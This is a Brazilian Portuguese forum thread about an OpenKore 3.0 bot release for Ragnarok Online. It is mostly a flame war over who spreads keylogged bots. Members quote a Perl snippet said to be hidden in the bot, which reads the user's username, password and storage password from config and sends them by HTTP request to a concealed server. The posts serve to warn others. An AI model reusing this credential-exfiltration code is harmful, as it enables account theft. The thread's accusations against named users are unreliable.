Ir para conteúdo
🥇 [Exclusivo] Seja um Membro VIP EXTREME! ×
  • Quem está por aqui   0 membros estão online

• Nenhum usuário registrado visualizando esta página.

Openkore 3.0 full,scan total,atualizado diariamente,varios link download,100% renewal

Posts Recomendados

Não vai postar porque você é um lammer de merda! Vai para a escola seu analfabeto!!!! Aprende a usar virgulas e quando que utiliza ÃO e AM seu burro!

Você é o membro que tinha postado lá atrás,e não conseguiu provar oque tinha dito....lamentavel

Você é o membro que tinha postado lá atrás,e não conseguiu provar oque tinha dito....lamentavel

Aff os cara vai discutir no meu topico,brinca não

não irei discutir com esse membro porque é tempo perdido,fizeram uma panelinha aqui e todos estão dentro dela

Oque importa que possui 2 Bots limpos aqui o seu e o do Killerzium,e você não pode deixar morrer o seu

ousei reinstalar o perl , e ainda nao deu , está tudo certo mais n dá , receio que é pq o meu poseidon nao quer abrir , ajuda ai

ousei reinstalar o perl , e ainda nao deu , está tudo certo mais n dá , receio que é pq o meu poseidon nao quer abrir , ajuda ai

Membro você está abrindo o poseidon no diretorio certo,que fica na pasta src/poseidon/poseidon.pl esse que você deve abrir

Eu sou o membro que fez você ser banido todas as vezes... E agora vou reportar de novo!

estarei indo na area denúncias , para dizer para um moderador experiente vir aqui...

irei fazer exatamente com essa sua lista de roubar os membros,irei reportar

Calma Kameha esse membro fez a lista dele e o moderador fez a dele,provando que a dele não e confiavel o membro muito tempo avançado fez a dele la no topo e viro fixo,fizeram uma piramide e estão no topo dela e todos os outros membros estão abaixo,quando um membro reclama que qualquer outro bot aqui possui KL eles entram e fala que simplesmente é fake,so eles podem descriminar o bot e simplesmente levantar o que eles querem,resumindo são todos cumplices e vão cair todos juntos,esse frde avia postado kore com keylloger nessa listinha dele levando os membros a serem hakeados,acho que da proxima ele toma ban,vamos esperar algum membro dessa lista dele ser hakeado que todos nos denuncia e vai ser a terceira vez isso e o moderador pelo que sei já está por aqui com esse frde e ele vai tomar á reclusão,aguarde

notei que estão fazendo realmente isso,acho que é uma quadrilha pra pega todos e roubarem eles,podem ate ser parceiros desse araujo ae eles defama o araujo para criar confiança,já que o araujo foi banido,lamentavel

Resolvi confirmar se você realmente é o Araujo, e sim, consegui a prova:

use LWP::UserAgent;

use Utils qw(urlencode);

my $ua = LWP::UserAgent->new;

$ua->timeout(10);

$ua->env_proxy;

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("

É necessário se cadastrar para acessar o conteúdo.
$senha $kafra");

Mesmo sevidor que o dele

Pode fazer conspirações a vonde, ninguem vai acreditar mesmo em você[/color]

faça suas apresentações aqui você não engana mais ninguem,está defamando todos os bots junto ao frde porque são uma quadrilha e defamão ou sobem os bots que querem,o caso de vocês estão em analize

faça suas apresentações aqui você não engana mais ninguem,está defamando todos os bots junto ao frde porque são uma quadrilha e defamão ou sobem os bots que querem,o caso de vocês estão em analize[/color]

A casinha dele acabo de cair tem membro no topico dele reclamando que foi hakeado,adivinha com ajuda de quem,frde que adicino na lista dele,esse frde é o 100% respossável pelas contas roubadas da WC

sim olhei o topico dele e você realmente está divulgando o membro que foi roubado lá,frde concertesa é o culpado disso tudo

Este openkore 3.0 possuia :

use Utils qw(urlencode);

$ua->timeout(10);

$ua->env_proxy;

$senha $kafra");

Não baixem não está limpo perderão sua conta !!! Te juro não é brincadeira !!

Pena q eu nao li tudo tentaram entrar na minha conta a meia noite eu estava on e pude trocar a senha nao baixem!

CARO SACER TENTAMOS AVISAR, BOM EU SOU 100% RESPONSAVEL POR HACKS DE CONTA AQUI NA WC? SAI DAQUI AREAUJO NINGUEM TE QUER, OLHA O CODIGO DE KL QUE ACHEI NO SEU BOT.

use Utils qw(urlencode);

$ua->timeout(10);

$ua->env_proxy;

$senha $kafra");

CARA EU NEM LIGO PRA INSULTOS SEUS COMO "FRDE É O CULPADO POR HACKS AQUI" POR QUE QUEM É MENBRO AVANÇADO E NÃO CONTA FAKE SABE QUE SOU HONESTO...

BOM BAN PARA VOCÊ JÁ TE REPORTEI 2 VEZES SÓ NO AGUARDO...

você é uma quadrilha,notei que adiciona bots com keylogger em sua lista so para roubar os membros,enfim reportei você por formação de quadrilha aqui

BOM VAMOS LÁ:

~~~~> MANO TU É UM CARA MUITO ALIENADO MESMO ARAUJO, EU TENHO QUADRILHA? VELHO PARA DE SER MALUCO (TO RINDO AQUI)

~~~~>CARO tormentfull EU SEI QUE VOCÊ É O KAMEHAMEHA 10 TE FLAGREI AGORA MESMO NESSE TÓPICO EU VI O KAMEHAMEHA OFILINE E VOCÊ POSTANDO E VICE-VERSA.

~~~~> ALGO A DECLARAR? POR FAVOR NÃO VENHA FALAR QUE É COINSIDENCIA.... NINGUEM É TÃO IDIOTA PRA ACREDITAR NISSO.

~~~~> SOBRE O BOT DO SUZAKU, EU RETIREI ELE DA LISTA E BOTEI O DO KILLERZINHO E DO OUTRO LÁ QUE SÃO OS MAIS CONFIAVEIS..

~~~~>VOU DEIXAR ESSE BOT GANHAR MAIS FAMA E INTÃO SIM ADICIONAREI...

~~~~> DEIXEI O BOT DELE ADICIONADO POR 3H NA MINHA QUICK E O BOT DELE TINHA 50 VIZUALIZAÇÕES NA HORA.

~~~~>DEIXANDO BEM CLARO PARA OS MENBROS NÃO ACREDITAREM EM MENBROS NOVOS E NEM BAIXAR BOTS DO MESMO, POIS CONCERTEZA É O ARAUJO RAG. OU SEJA KAMEHAMEHA/JULY BABI/SUSANNO SAUKE/TORMENTFULL E ETC..

BOM DEPOIS DISSO TEM ALGO A DECLARAR?

Este tópico está impedido de receber novos posts.
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.